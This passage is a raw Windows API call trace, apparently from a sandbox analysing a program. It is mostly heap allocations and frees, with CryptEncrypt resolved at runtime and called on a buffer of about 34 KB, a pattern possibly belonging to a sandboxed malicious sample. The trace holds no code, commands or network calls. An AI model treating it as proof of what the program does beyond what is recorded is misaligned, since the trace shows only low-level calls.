dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0267.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51d60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.275] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0267.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.275] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x850b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8510) returned 1 [0267.275] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.275] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0267.275] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.275] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.275] CharLowerBuffW (in: lpsz="byte[34064]", cchLength=0xb | out: lpsz="byte[34064]") returned 0xb [0267.276] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.277] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.277] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0267.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.277] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0267.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0267.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0267.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0267.278] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.278] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0267.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.279] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.279] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0267.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.280] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x850b) returned 0x2f37478 [0267.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f37478 | out: hHeap=0x970000) returned 1 [0267.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0267.281] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0267.281] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0267.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0267.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0267.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.282] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.282] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0267.282] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51e98 [0267.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.286] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0267.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e541e8 [0267.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0267.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0267.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0267.286] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2ef60*, pdwDataLen=0x8cef60*=0x850b, dwBufLen=0x8510 | out: pbData=0x2f2ef60*, pdwDataLen=0x8cef60*=0x8510) returned 1 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0267.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.294] RtlAllocateHeap 